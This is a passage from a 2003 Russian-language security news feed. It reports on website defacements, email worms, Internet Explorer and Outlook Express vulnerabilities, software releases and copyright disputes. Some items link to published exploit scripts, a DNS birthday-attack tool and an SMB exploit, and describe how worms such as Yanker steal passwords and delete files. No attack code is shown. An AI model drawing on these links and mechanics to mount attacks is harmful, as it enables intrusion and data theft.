Около 1500 вэб-сайтов компании Bargainhost, специализирующейся на вэб-хостинге, пострадало в результате недавней хакерской атаки. Фирма Bargainhost (bargainhost.co.uk) предоставляет услуги Вэб-хостинга многим компаниям, в числе которых, например, сноубордисткий сайт powderroom.net, потерявший в результате хакерской атаки почту за 7 месяцев, а также всю контактную информацию и форумы. Как сообщается, хакеры проникли на сервер, взломав его защиту. В дальнейшем была похищена база паролей всех Вэб-серверов, хостящихся на Bargainhost и осуществлён дефейс около 1500 Вэб-сайтов из 5000. В результате бэкапа, выполненнного администраторами сайта, удалось восстановить не всю информацию. Пользователи выразили большое неудовольствие качеством работы фирмы. Подробности - http://www.securitynewsportal.com/cgi-bin/cgi-script/...
27/04/2003 12:37 CodeWeavers переносит Office XP на Linux.
С выходом коммерческого приложения Cross Over Office, позволяющего исполнять Office ХР на операционной системе с открытым исходным кодом, пользователи Linux получили возможность работать с этим пакетом. В настоящее время продукт компании CodeWeavers поддерживает все компоненты Office ХР, за исключением Outlook XP и Access XP. Поддерживаются версии Outlook 2000 и Access 2000. Пакет устанавливается на стандартный рабочий стол Gnome или KDE и обеспечивает прозрачное, как утверждает Codeweavers, взаимодействие комплекса офисных приложений Microsoft с операционной системой open-source. «После установки ваше приложение оказывается интегрированным непосредственно в среду Gnome или KDE», — говорится на веб-сайте компании. Сам пакет Cross Over Office не является продуктом open-source. Пакет поддерживает не только продукты Microsoft, но и Adobe Photoshop 7.0, Lotus Notes и Intuit Quicken. Cross Over Office имеет дело не с приложениями, а с операционной системой, в отличие от других проектов, нацеленных на то, чтобы отнять долю рынка у Microsoft, — а их в прошлом было немало. Подробности - http://www.zdnet.ru/?ID=300061
27/04/2003 11:53 Бесплатные сервисы Panda Software: дополнительные возможности для веб мастеров.
Начиная с апреля 2003 года, Panda Software проводит по всему миру компанию по предоставлению дополнительных бесплатных онлайновых средств. Благодаря инициативе испанского разработчика антивирусных программ, веб мастера получили возможность включать в содержимое своих сайтов полную и актуальную информацию о различных вредоносных кодах, а также мощные бесплатные антивирусные средства. Объекты, разработанные программистами Panda Software, делают сайт более функциональным, а его дизайн – более привлекательным. Кроме того, они позволяют повысить посещаемость сайта. В комплект онлайновых сервисов компании Panda Software входят: - Вирусометр Panda (Panda Virusometer), оценивающий вероятность заражения компьютеров вирусами и потенциальный размер ущерба от такого заражения; - Интерактивная Вирусная Карта Panda Software (Panda Software Virus Map), на которой в режиме реального времени графически отображается действие вирусов по географическим регионам мира; - Утилиты для восстановления Panda Quick Remover, разработанные для борьбы с последствиями действия наиболее распространенных вирусов на компьютере; - Вирусные Новости (Panda Virus News), предоставляющие свежую информацию о последних и наиболее активных вирусах; - Рейтинг Вирусов (Top Viruses) – рейтинг наиболее опасных на планете вирусов в любой данный момент времени; - Panda ActiveScan – один из наиболее эффективных онлайновых антивирусов. Эта бесплатная программа по запросу обнаруживает и устраняет вирусы на любом компьютере, подключенном к сети Интернет. Программа переведена на одинадцать языков, включая русский, японский, английский, немецкий, испанский, китайский, французский и итальянский. Перечисленные веб сервисы легко и просто интегрируются в сайт. Все, что требуется от веб мастера, это скопировать и вставить в код выбранной страницы HTML код того или иного сервиса. Благодаря этому предложением Panda Software может воспользоваться даже начинающий веб мастер и любой пользователь, умеющий создавать самые простые веб страницы. Более подробно - http://www.viruslab.ru/press/index.php?go=show&num=138
27/04/2003 11:28 Компьютеры не болеют атипичной пневмонией.
В последние дни в СМИ появилось множество сообщений о начале новой эпидемии компьютерного вируса, известного как I-Worm.Coronex, чему немало поспособствовала присвоенная вирусу южнокорейской компанией HAURI Inc. средняя степень опасности. Обнаружившая "червя" шесть дней назад "Лаборатория Касперского" выражает недоумение подобным поведением антивирусной компании, претендующей на профессиональный подход к освещению событий в области компьютерных вирусов, и считает необходимым напомнить, что сетевой червь Coronex, во-первых, совершенно не способен распространяться по электронной почте из-за ряда допущенных при его создании ошибок, и, во-вторых, не содержит абсолютно никаких деструктивных функций: единственным результатом заражения является замена стартовой страницы Internet Explorer на статью об атипичной пневмонии на сайте Всемирной Организации Здравоохранения. Следует понимать, что новые методы социального инжиниринга (маскирование под информацию об атипичной пневмонии) - это еще не повод "трубить" о Coronex на весь мир, провоцируя панику и, впоследствии, заслуженные укоры в адрес всей антивирусной индустрии в целом. То, что Coronex не представляет собой никакой опасности должно быть ясно даже начинающему вирусологу после поверхностного анализа кода "червя". "Мы считаем данный случай ярким примером злоупотребления доверием пользователей и средств массовой информации. На наш взгляд, это возмутительный прецедент нагнетания истерии с целью продвижения своего брэнда. Такое поведение дезориентирует интернет-сообщество и дискредитирует антивирусную индустрию", - заявил Денис Зенкин, руководитель информационной службы "Лаборатории Касперского". Пользователям же стоит помнить, что компьютеры не болеют вирусом атипичной пневмонии. Это, к сожалению, участь людей. Источник - http://www.viruslist.ru
27/04/2003 10:57 Новый сайт по новостям из мира Linux.
Как нам сообщил Евгений (knoppix(at)knoppix.ru), открылся новый русскоязычный сайт, посвящённый последним новостям из мира Linux и дистрибутиву Knoppix - работающему прямо с компакт-диска. Планируется выпуск Русского дистрибутива Knoppix. Cайт проекта - http://www.knoppix.ru
27/04/2003 10:25 HP усиливает защиту картриджей от подделок.
HP объявил о начале поставок в Россию и другие страны Восточной Европы, Ближнего Востока и Африки картриджей для струйных принтеров в упаковках с новой защитной этикеткой, которая позволит покупателям отличить подлинные товары от поддельных. Компания НР вводит в обращение новую защитную этикетку с целью укрепить доверие покупателей к высококачественным и надежным картриджам HP и защитить своих клиентов от подделок и обмана. Защитная этикетка HP обладает рядом характерных особенностей, позволяющих конечным пользователям и партнерам по продажам с первого взгляда определить подлинность картриджей для струйных принтеров HP. Если смотреть на лицевую сторону упаковки, логотип "hp invent" выглядит зеленым. При взгляде под любым другим углом логотип меняет цвет на синий благодаря использованию специальной краски, изменяющей свой цвет в зависимости от угла зрения. Указанная область логотипа – глянцевая и переливается при рассмотрении под некоторыми углами зрения. Кроме того, через защитную этикетку проходит теплочувствительная нить, на которой при энергичном потирании пальцем появляется надпись "hp invent". По мере остывания теплочувствительной нити она обретает свой первоначальный синий цвет, и надпись исчезает. Если уже открытая упаковка будет использоваться для повторной продажи, на защитной этикетке будут заметны следы разрыва. Подробнее - http://www.cnews.ru/newsline/index.shtml?2003/04/25/143787
26/04/2003 15:34 Birthday-атаки на DNS.
Ramon Izaguirre опубликовал в своём письме в BUGTRAQ Перл-скрипт для реализации так называемой bithday - атаки на DNS-сервера. Подобный тип атаки на DNS был впервые описан в ноябре 2002 г. Вагнером Сакраменто и заключался в посылке DNS-серверу множества пакетов с различных адресов для увеличения вероятности угадывания двухбайтового идентификатора запроса DNS-сервера. Также технология birthday-атаки была описана Joe Stewart в январе 2002 г. и тогда же был выпущен скрипт для проверки возможности реализации атаки. Однако скрипт сам по себе не осуществлял атаку. Рамон опубликовал скрипт, который реализует атаку birtday. Суть её можно описать так (cпасибо security.nnov.ru). DNS использует двухбайтовый идентификатор запроса для предотвращения спуфинга. Ответы с неверными идентификаторами игнорируются. Проблема в том, что если пришло несколько одинаковых запросов, все они передаются наружу с разными идентификаторами, но с одного UDP порта. При этом вероятность успешной атаки спцфинга существенно возрастает (эффект дней рождений, у 60 случайных человек вероятность наличия двух с одним днем рождения свыше 95%). Эксплоит включает в себя 2 скрипта - poison.pl (определяет порт DNS-сервера) и hds0.pl (осуществляет атаку по замене IP-адреса в базе данных DNS-сервера). Технология осуществления атаки описана в письме Рамона. Подробности - http://www.security.nnov.ru/search/document.asp?docid=4446 Эксплоит - http://www.security.nnov.ru/files/birthday.pl
26/04/2003 14:22 Поздравляем сайт BUGTRAQ.RU!
Команда UINC поздравляет команду сайта bugtraq.ru и персонально Дмитрия Леонова, ака dl c третьим местом в номинации "Хард'н'софт сайт года" ежегодного сетевого конкурса РОТОР'2003, а также с третьим местом в номинации "Отраслевой сайт года" (на самом сайте bugtraq про второе третье место почему-то не говорится ;) ). Результаты конкурса - http://ezhe.ru/POTOP/
26/04/2003 14:08 Verizon придётся сдать своего подписчика RIAA.
Вчера федеральный судья отклонил апелляционную жалобу Verizon Communications, где провадер пытался доказать, что требования RIAA раскрыть данные о пользователе является противоречащим первой поправке Конституции. Напомним, что еще в январе этого года, рассматривая требования Ассоциации звукозаписывающих компаний Америки к Verizon Communications, суд постановил раскрыть данные о пользователе, который за один день скачал более 600 пиратских музыкальных файлов. Руководство Verizon Communications не согласилось с решением суда, поскольку раскрытие данных о клиенте могло повлечь за собой недовольство остальных и подал дело на повторное рассмотрение, апеллируя тем, что раскрытие данных о клиенте противоречит свободе слова и нарушает конфиденциальность частной информации. Однако окружной судья Джон Д. Батс не нашел в требовании RIAA к Verizon Communications ничего противозаконного и сообщил, что первая поправка Конституции никак не противоречит принятому в 1998 году «Закону о защите авторских прав в цифровую эпоху» (DMCA). Тем не менее, в этом деле остается много спорных вопросов. Согласно Закону DMCA провайдеры должны раскрывать сведения о своих клиентах, если обладатель авторских прав предъявляет доказательства причастности клиента к цифровому пиратству. Однако провайдеры и крупные интернет-компании не согласны с таким положением, поскольку раскрытие конфиденциальной информации о клиенте может повлечь за собой большие неприятности в работе с клиентами. Источник - http://www.internet.ru
26/04/2003 13:15 Бойтесь архивов RAR - в них может скрываться опасный вирус.
В интернете обнаружен чрезвычайно опасный многокомпонентный вирус-червь Yanker. Ползет он по сети довольно хитрым способом - в виде архива RAR, прикрепленного к зараженным письмам. Зараженные письма содержат: Заголовок: Hi,my new webpage ;o) Текст письма: Hi: Here is my new webpage.Please check it,and give Me some Advice. Имя вложения: webpage.rar Архив RAR содержит в себе файл "webpage.htm" и подкаталог "images", в котором содержатся основные компоненты вируса. После того как пользователь разархивировал вирусный архив, червь может получить управление двумя разными способами: при открытии файла "webpage.htm" или при просмотре каталога "images" при помощи MS Explorer. В обоих случаях червь использует для своего запуска один и тот же эксплойт "CodeBaseExec", встроенный в конец файлов. При помощи него запускается на исполнение файл "main_59.exe". Данный файл записывает текущий IP-адрес компьютера в файл ip.txt, извлекает из себя и запускает основной компонент червя - файл "yankee.vbs". Этот файл написан на Visual Basic Script и имеет размер около 4к. Скрипт "yankee.vbs" при запуске осуществляет следующие действия: Отсылает на адрес "xdvirus@peoplemail.com.cn" письмо, в которое помещает все обнаруженные пароли (при помощи утилиты PassDumder) и вложение "ip.txt" с IP-адресом пораженного компьютера; Отсылает по всем адресам электронной почты, найденным в адресной книге MS Outlook, свой архив "webpage.rar"; Записывает в системный реестр Windows ключ: HKCU\SOFTWARE\yankee yankee = 1; Удаляет все доступные (не системные) каталоги на жестких и съемных дисках. Подробности - http://www.viruslist.com/index.html?tnews=1001&id=2177512
26/04/2003 12:11 Информация о черве Fasong.
Новый червь Fasong распространяется, создавая свои копии на локальных и сетевых дисках. Он является приложением Windows (PE EXE-файл), имеет размер около 170K и написан на Delphi. Червь копирует себя со случайными именами на все доступные локальные и сетевые диски. Для автозапуска на удаленном компьютере он создаёт в корневом каталоге диска файл "autorun.inf" и записывает в него команду автозапуска (секция [autorun], инструкция OPEN=). Fasong содержит троянскую процедуру. Он считывает персональные данные OICQ, а также других китайских программ и отправляет их письмом своему "хозяину". Червь пытается выгрузить некоторые антивирусы и файрволлы (остановить их работу). Источник - http://www.kaspersky.ru
26/04/2003 11:04 Причина некорректности патча для WinXP - недостаточное тестирование.
Ранее сообщалось о проблемах с одним из последних патчей для операционных систем Windows 2000 и XP. В случае Windows 2000 в патче фигурируют несколько файлов, описание которых отсутствует в сопроводительной документации. В случае же Windows XP горе-заплатка существенно замедляет работу компьютера. Первоначальная версия о том, что патч конфликтует с антивирусными мониторами, не подтвердилась. Как оказалось, торможение наблюдается после установки патча в систему с установленным Service Pack 1 из-за недостаточно тщательного тестирования. Изучив проблему, Microsoft убрала патч из службы автоматического обновления и выпустила обновленную версию бюллетеня MS03-013. В ней пользователям Windows XP SP1 рекомендуется изучить все за и против и принять решение об установке патча самостоятельно. Если дыра представляется действительно опасной, то заплатку нужно установить несмотря на тормоза. В противном случае стоит дождаться выхода обновленного патча, который должен появиться в ближайшем будущем. Обновлённый патч - http://www.microsoft.com/technet/treeview/default.asp?...
26/04/2003 10:55 Программа для борьбы со спамом.
Компания Vanquish выпустила новую версию одноименного пакета для борьбы со спамом. Этот пакет устанавливается на почтовом сервере провайдера и обеспечивает экономическое давление на спамеров. Каждый, кто захочет послать письмо по защищенному Vanquish адресу должен будет предварительно завести небольшой денежный счет и вставить в письмо кнопку. Если получатель считает такое письмо спамом, он нажимает кнопку, и со счета отправителя немедленно снимается небольшая сумма денег - около 5 американских центов. И хотя эта сумма кажется небольшой, в случае массовых рассылок она значительно возрастает. У системы Vanquish есть только один недостаток - необходимость заводить антиспамерский счет и класть на него деньги. Не очень понятно и то, как в таком случае быть с перепиской с людьми из стран, где Vanquish-счет завести невозможно. Источник - http://www.compulenta.ru
25/04/2003 21:44 Руководство по обеспечению безопасности Win2003.
Господин Майкл Ховард из MicrosssoftЪ объявляет о выпуске руководства по обеспечению безопасности операционной системы Windows 2003. Называется сей перл "Windows Server 2003 Security Guide". Руководство - http://go.microsoft.com/fwlink/?LinkId=14845
25/04/2003 13:37 Выход GCC 3.2.3.
Free Software Foundation, Inc., сообщает о выпуске новой версии популрного компилятора GCC - 3.2.3. В основном представлены только багофиксы версии 3.2.2. Ничего кардинально нового не внесено. Подробности http://gcc.gnu.org/gcc-3.2/changes.html
25/04/2003 12:58 Эксплоит для "Authentication flaw in Windows SMB protocol".
Пару дней назад сообщалось о возможности получения полного контроля над сетевыми ресурсами, используя злонамеренный SMB сервер. Ниже эксплоит, позволяющий подключить диск С$ на целевой системе. В качестве злонамеренного SMB сервера используется samba-2.2.8a. Эксплоит выложен ребятами из securitylab. Для использования эксплоита необходимо патчить SMB-клиент из пакета SAMBA - smbclient. Подробности - http://www.securitylab.ru/?ID=37484
25/04/2003 11:09 Microsoft предлагает новую технологию защиты от копирования.
Корпорация Microsoft сделала очередной шаг в своем продвижении в музыкальный бизнес. В среду софтверный гигант заключил с компанией Macrovision соглашение о лицензировании своей новой технологии записи музыкальных файлов на компакт диски Windows Media Data Session Toolkit, предусматривающую защиту цифровых прав производителей. Корпорация Microsoft уже несколько месяцев ведет переговоры с крупными музыкальными лейблами, предлагая защитить продаваемые диски от несанкционированного копирования. Однако в то время, как звукозаписывающие компании США ищут все новые (и относительно дешевые) пути защиты от копирования, Microsoft ищет партнеров за пределами Америки. Соглашение с Macrovision возможно окончательно убедит музыкальные лейблы в необходимости применения Windows Media Data Session Toolkit, поскольку данная технология позволит потребителям музыкальной продукции быть более гибкими в использовании цифровой музыки на своих ПК или MP3 – плеерах. Источник - http://www.internet.ru
25/04/2003 10:28 Появление четырёх новых червей.
Компания Symantec предупреждает о четырех новых вредоносных программах. Троян Backdoor.OptixPro.13 является новым вариантом уже известной программы Backdoor.OptixPro.12.b. Троян записывает себя в системные папки Windows и меняет ключи реестра, обеспечивая сой автозапуск. Будучи активным, OptixPro.13 позволяет злоумышленнику выключать и перезагружать компьютер, отключать пользователей, а также вызывать появление синего экрана. Другой троян Backdoor.Simali также копируется в системную папку Windows и активируется при каждом запуске компьютера. После установки в системе троян извещает об этом автора по ICQ и электронной почте и позволяет хакеру выполнять на компьютере произвольные действия. Еще одна вредоносная программа VBS.Zizarn обладает крайне деструктивными свойствами - она пытается стереть всю информацию на дисках компьютера, включая флоппи-дисковод и сетевые накопители. К счастью данная программа не содержит функций саморазмножения и поэтому остается малораспространенной. Однако пользователям стоит сохранять бдительность, потому что риск массовой рассылки VBS.Zizarn все же существует. Вирус VBS.Annod.C является новым вариантом червя VBS.Annod. Он не несет деструктивных функций за исключением того, что перезаписывает все vbs-файлы в папке своими копиями. Действие вируса заключается в показе сообщений на испанском языке и запуске случайной программы при старте Windows. Источник - http://www.compulenta.ru
25/04/2003 10:04 Вышла долгожданная серверная ОС Windows Server 2003.
Новая ОС позиционируется как продукт с возможностями профессиональных промышленных систем и низкой общей себестоимостью. Она пережила несколько переименований еще до появления на рынке. Сопровождая выход новой ОС широкой рекламой, компания надеется склонить к модернизации тех пользователей, которые до сих пор работают на более ранних версиях серверных ОС семейства Windows. Как известно, официально прекращение поддержки Windows NT произойдет в конце 2004 года, таким образом, у колеблющихся клиентов остается еще около 18 месяцев, чтобы окончательно определиться, переходить ли им на новую систему или продолжать работать в ОС без поддержки производителя. По прогнозам специалистов, за этот период около 80% продаж Server 2003 придется на бывших пользователей NT. При этом сейчас около 49% Windows-серверов работает под управлением NT и около 62% - под управлением Windows 2000. Большинство же компаний используют комбинацию этих двух систем. Число усовершенствований в новой ОС доходит до 500, однако, за исключением Active Directory, все они относятся к функциональным улучшениям. Лишь Active Directory подверглась серьезным изменениям, которые придали её большую производительность, легкость в использовании и снизили отводимую под нее пропускную способность сети. Server 2003 станет теперь хорошим инструментом для тех компаний, которые будут широко использовать возможность Active Directory в более объемной и комплексной конфигурации. Из других обновлений можно отметить полностью переписанный Internet Information Services (IIS), включение поддержки неоднородного доступа к памяти (NUMA) и поддержки всех пяти 64-битных систем, которые вскоре появятся в продаже. Источник - http://www.newsfactor.com/
24/04/2003 19:20 Выход Trusted Debian 1.0.
Peter Roozemaal сообщил широкой общественности о выходе 22 апреля 1-й версии нового дистрибутива под названием Trusted Debian. Дистрибутив разработан и поддерживается проектом аналогичного названия. Особенностью этого дистрибутива является повышенная защита от переполнения буфера. Trusted Linux является первым проектом, который решил включить эту защиту прямо в дистрибутив. Подобная защита осуществляется при помощи продуктов PaX, представляющий собой кусок кода в ядре, а также продукта stack protector (старое название - propolice), представляющего собой модифицированный GCC-компилятор, написанный Hiroaki Etoh из IBM. Trusted Debian также включает в себя систему разграничения доступа RSBAC и FreeS/WAN, при помощи которого осуществляется шифрация трафика между двумя участниками сетевого соединения. Хотелось бы, правда, заметить, что авторы несколько лукавят, представляя свой проект единственным, в котором включена защита от переполнения буфера. Подобная защита в некоторой мере содержится в OpenBSD и в gr-security, входящем в состав дистрибутива Gentoo Linux. Подробности - http://www.trusteddebian.org/press.html
24/04/2003 13:48 Семинар "Обзор возможностей Windows Server 2003".
Компания Softline приглашает посетить бесплатный семинар "Обзор возможностей Windows Server 2003", который посвящён обзору возможностей новой операционной системы Windows 2003 Server. Семейство продуктов Windows Server 2003 является следующим шагом в непрерывной эволюции серверных операционных систем Windows. Windows Server 2003 основана на повышенной надежности, масштабируемости и управляемости Windows 2000 Server, таким образом она является инфраструктурной платформой высокой производительности для поддержки связанных приложений, сетей и веб-служб XML в любом масштабе - от рабочей группы до центра данных. С докладом выступит преподаватель Учебного Центра SoftLine Игорь Воронин. Как обычно, ссеминар состоится в здании Математического Института им.Стеклова по адресу: г.Москва, ул. Губкина, 8. Начало регистрации в 9.30 29 апреля. Регистрация - здесь
24/04/2003 13:05 Многочисленные уязвимости в IE.
Корпорация Microsoft выпустила 23 апреля два новых бюллетеня безопасности, в которых описываются пять новых уязвимостей в браузере Internet Explorer версий 5.01, 5.5 и 6.0, а также в почтовом клиенте Outlook Express. Четыре уязвимости были обнаружены в Internet Explorer и еще одна - в Outlook Express (о ней мы уже сообщили). Последняя, равно как и три дыры в IE, носят критический характер - способны привести к запуску на компьютере жертвы произвольного программного кода. В бюллетене безопасности MS03-015 описывается новый кумулятивный патч для Internet Explorer, который наряду с уже исправленными прошлыми патчами дырами ликвидирует четыре новые. Первая из новых дыр имеется в библиотеке urlmon.dll и связана с тем, что Internet Explorer неправильно обрабатывает некоторые параметры, относящиеся к передаваемой сервером информации. В результате, при обработке веб-страниц определенной структуры возникает ошибка, позволяющая хакеру запустить на компьютере произвольный код. Для реализации атаки достаточно заманить пользователя на такую страницу. Никаких дополнительных действий от пользователя не требуется. Вторая уязвимость в IE, единственная, которой был присвоен "умеренный" рейтинг, содержится в модуле браузера, ответственном за загрузку файлов на удаленный компьютер. Используя данную дыру, хакер может загрузить с компьютера жертвы файл с заранее известным именем. Следующая критическая дыра содержится в модуле Internet Explorer, ответственном за работу с плагинами для обработки файлов, которые не поддерживаются браузером по умолчанию. При работе с такими файлами некоторые из служебных параметров обрабатываются неправильно. В результате, злоумышленник может направить браузеру особым образом сформированный URL, который запустит скрипт во время обработки "чужого" файла. Для пораженного компьютера такая атака может иметь плачевные последствия. Четвертая уязвимость содержится в модуле обработки модальных диалогов (modal dialogs). Некоторые из входных параметров проверяются браузером неправильно, что также может привести к запуску скрипта, открывающего хакеру доступ к файлам на пораженном компьютере. Кроме того, в состав кумулятивного патча включено исправление для браузера Internet Explorer 6.0 SP1, исправляющее ошибки с отображением помощи в зоне безопасности локального компьютера. Наконец, новый патч блокирует ActiveX-модуль Plugin.ocx, в котором также имеется уязвимость. Бюллетень MS03-15 - http://www.microsoft.com/technet/treeview/...
24/04/2003 12:31 Вирус атипичной пневмонии вышел в Интернет.
В Интернете появился новый червь, заражающий компьютеры через электронную почту. Как стало известно The Register, вирус распространяется в письмах, в заголовках которых говорится, что письмо содержит информацию об атипичной пневмонии. Червь, получивший название Coronex-A, рассылает свои копии по всем контактам из адресной книги Outlook. В заголовке создаваемых вирусом сообщений обязательно оказывается словосочетание "атипичная пневмония". Код вируса находится в прикрепленном к письму файле. Червь Coronex-A опасен только для компьютеров, на которых установлен Windows. Это значит, что под угрозой находятся более 70 процентов всех подключенных к Интернету систем. Специалисты по компьютерной безопасности заявляют, что это уже не первый случай, когда создатели вирусов рассчитывают "сыграть" на повышенном интересе пользователей к той или иной теме. По мнению некоторых экспертов, авторство Coronex-A принадлежит тем же людям, которые недавно выпустили в сеть вирус "Ирак". Подробности - http://www.theregister.co.uk/content/56/30370.html
24/04/2003 12:03 У браузера Phoenix новое название и... опять проблемы?
Новость не совсем свежая, но всё же, заслуживающая внимания. Получена от SHuRuP с nixp.ru. Ранее мы сообщали о выпуске проектом Mozilla достаточно компактного и быстрого броузера под названием Phoenix (на настоящий момент выпущена его версия 0.5). После месяцев дискуссий и последуюших месяцев решения правовых вопросов разработчики определились с названиями. Новое имя Pheonix'а (web-браузера, основанного на движке Mozilla) теперь "Firebird". В связи с этим, в ближайшее время будет обновлена документация и сам браузер. Также было получено разрешение на использование названия "Thunderbird", такое имя отныне присвоено почтовому клиенту. Разработчики надеются, что теперь все вопросы легальности названия пропадут... Но уже через несколько часов после публикации сообщения о смене названия браузера в обсуждении новости на mozillazine.org (http://www.mozillazine.org) некий пользователь под ником earlybird сообщил, что данное имя уже занято свободно-распространяемой системой управления БД. Источник - http://www.mozillazine.org
24/04/2003 11:32 Cтатья о технологии работы механизмов NTLM v.2.0 и Kerberos в ОС Windows.
Собственно, это даже и не статья, а скорее учебное пособие от Microsoft, предназначенное для обеспечения максимальной безопасности ОС Win2K, под названием "Windows 2000 Security Hardening Guide". Ссылку приводим исключительно потому, что в форуме очень часто задаются вопросу о механизмах формирования NTLM - хэшей. Как раз в руководстве эта процедура описана очень подробно, наряду с описанием технологии Kerberos. Надеемся, описание поможет снять многие вопросы и помочь исследователям безопасности Windows-сетей, построенных на протоколе SMB(CIFS). Руководство - http://www.microsoft.com/technet/security/... Скачать - http://www.microsoft.com/downloads/details.aspx?...
24/04/2003 11:13 Совокупная заплата для Outlook Express.
Уязвимость, обнаруженная в MHTML URL обработчике, позволяет атакующему создать URL, который обработает любой текстовый файл, сохраненный на локальном компьютере, как HTML код. Если этот текстовый файл содержит код сценария, то такой сценарий будет выполнен при обращении к этому файлу в контексте Local Computer Security Zone. Используя этот метод, атакующий может создать URL, и расположит его на Web сайте или послать по email. Если пользователь кликнет на URL, расположенный на Web сайте, то атакующий сможет читать и запускать файлы, расположенные на локальной машине. Если URL был предан по электронной почте, то, если не установлен Outlook Email Security Update, сценарий может быть выполнен без какого либо вмешательства пользователя. Microsoft оценила опасность обнаруженной уязвимости как "Critical". Уязвимость обнаружена в Microsoft (c) Outlook Express. Для устранения уязвимости выпущен патч MS03-014. Патч и описание - http://www.SecurityLab.ru/?ID=37433
24/04/2003 10:35 Новый старый Midnight Commander.
Наверняка большинству линуксоидов, фрибсдоидов и прочих юниксоидов знаком популярный файловый менеджер Midnight Commander. Особенно он близок сердцу людей, заставших времена DOS и Norton Commander-а, интерфейс которого и был взят за основу в "полночном коммандире" (кстати, также, как и в не менее популярном файловом менеджере FAR господина Рошаля). Как сообщает на сайте linux.org.ru, возродилась ветка 4.1 знаменитого файлового менеджера. Масса плюсов как по сравнению с прародителем (Advanced Midnight Commander 4.1.35), так и с текущей веткой 4.6. Включены: поддержка кодировок в панелях, редакторе и вьювере, сохранение позиций просмотра и редактирования, поддержка FXP, расцвечивание файловых групп и реалтаймовые часы. :) Исключены все остатки X-наследия, включая Glib, так что, теперь mc можно назвать консольным :) Подробности - http://mc.linuxinside.com
24/04/2003 10:05 Общежития МГУ сидят на "черном" интернете.
Почти каждому студенту МГУ известен университетский провайдер "Радио МГУ". Однако далеко не все знают о том, что этот самый провайдер "вчерную" приторговывает академическим трафиком. Хотя правилами cети запрещено использование доступа в интернет в целях, отличных от научных, университетский провайдер, почти не скрываясь, торгует доступом в интернет налево. Правда, трафик продается не совсем уж на сторону, а студентам МГУ, проживающим в общежитии. Вот так, например, выглядят тарифы для студентов, проживающих в зоне "Б" Главного здания: подключение 100 руб., 1 МБ трафика - EUR0,0163. "Радио МГУ" начало свою "благотворительную" деятельность в общежитии Главного здания еще в прошлом году. До этого в общежитии был перекрыт бесплатный интернет-канал от другого университетского провайдера Msunet. Ему студенты ничего не платили за трафик, а поддержка сети стоила около $2 в месяц (администратору сети общежития на пиво). Тогда ежемесячный оборот составлял порядка 600-700 ГБ. Для сравнения: весь мехмат МГУ в месяц сейчас бесплатно выкачивает не более 15 ГБ. Новый провайдер, "Радио МГУ", также пообещал студентам бесплатный трафик. Но слова своего не сдержал. Одновременно с подключением общежития к "Радио МГУ" возник и такой казус: во имя коммерческого доступа были "зажаты" бесплатные каналы, которые идут от "Радио МГУ" на физфак и мехмат. Скорость работы там не превышала 5 Кб/с, в то время как в общежитии, по выражению источника 5баллов.ru, "все просто летало". Главный организатор данного "бизнеса" в зоне "Б" - студент-старшекурсник физфака МГУ. С его помощью без всяких документов и лицензий собирается черный нал, часть которого ($10 за 1 ГБ "бесплатного" трафика, по словам самого юного "бизнесмена") отходит "Радио МГУ". Более подробно - http://www.cnews.ru/newtop/index.shtml?2003/04/23/143568
23/04/2003 15:19 Новости об акции против Центра Американского Английского.
Нашлась тут информация о том, как прошла акция про известных спаммеров Рунета - центра американского английского (умышленно пишу маленькими, потому как и меня достали), проводившаяся 17 апреля. На сайте Russ.ru появилась информация о второй части акции и краткий отчет о достигнутых результатах. Если вкратце - 17 апреля отзвонилось около тысячи человек. Девушек, отвечающих на звонки, достали, но то, что это была какая-то централизованная акция - они не в курсе. Сайт американского центра прекратил свое существование, но зенон отрицает свою причастность к этому скорбному событию. Возможно, ребята просто забыли проплатить доменное имя... Кому-то спама стало сыпаться меньше, кому-то - больше. Похоже, просто в очередной раз сменился используемый спам-лист. Про пробелы в сообщениях уже, наверное, все в курсе. Наконец, финал - перенос деятельности в оффлайн. Сегодня утром у метро раздавали листовки ALC. Более подробно можно узнать из ссылки, приведённой ниже. Подробнее - http://antialc.narod.ru/
23/04/2003 13:19 Китайцы предупреждают о появлении нового-старого вируса.
Сразу несколько китайских разработчиков антивирусных программ опубликовали предупреждение об ожидаемой 26 апреля активации новой разновидности одного из самых опасных компьютерных вирусов CIH. Впервые появившись в 1998 году, этот вирус вскоре нанес по всему миру ущерб на сумму свыше 1 млрд. долларов, полностью уничтожая данные на жестких дисках инфицированных компьютеров и поражая BIOS материнских плат. Источник - http://www.interfax.ru
23/04/2003 12:38 Хакеры не простили Мадонне фальшивок.
Недавнее заявление Мадонны о непримиримости против пиратского распространения ее синглов с нового альбома певицы "American Life" вызвала бурю негодования среди почитателей ее творчества, которые надеялись скачать новые песенки через пиринговые сети. Напомним, что в целях профилактики против пиратского распространения своего альбома Мадонна наводнила пиринговые службы ложными файлами новых песен. Тот, кто скачивал такой файл – обманку вместо песни слышал голос поп-дивы, который вопрошал "What the f*** do you think you're doing?" Естественно, реакция хакеров на столь необычное в Сети явление не заставила себя ждать. Как сообщает CNET News.com, на прошлых выходных хакеры взломали сайт Мадонны, оставив ей на главной странице ответ: "This is what the f*** I think I'm doing.". Но самое ужасное состояло в том, что кроме сообщения хакеры оставили и ссылки на несколько песен из ее нового альбома, с чем так яростно боролась Мадонна. Как сообщили Reuters в звукозаписывающей студии Мадонны, нормальную работу сайта уже удалось восстановить, однако прокомментировать действия хакеров представители певицы отказались. Источник - http://www.internet.ru/lentanews/n_e662.esp
23/04/2003 12:14 Неофициальная версия Service Pack 4 для ОС Windows 2000.
На нынешней неделе в интернете появилась неофициальная предварительная версия пакета обновлений Service Pack 4 для ОС Windows 2000. В новый сервис-пак должны воти все обновления, выпущенные после выхода SP3 в августе прошлого года. "Утекшая" версия сервис-пака имеет номер билда 4066. Появление сервис-пака в интернете связано, по-видимому, с его бета-тестированием, начавшимся в апреле. Необходимо заметить, что устанавливать данный пакет обновлений можно только на свой страх и риск - официально он Microsoft не поддерживается. Источник - http://www.compulenta.ru
23/04/2003 11:33 Студенты лишились доступа в интернет за скачивание музыки.
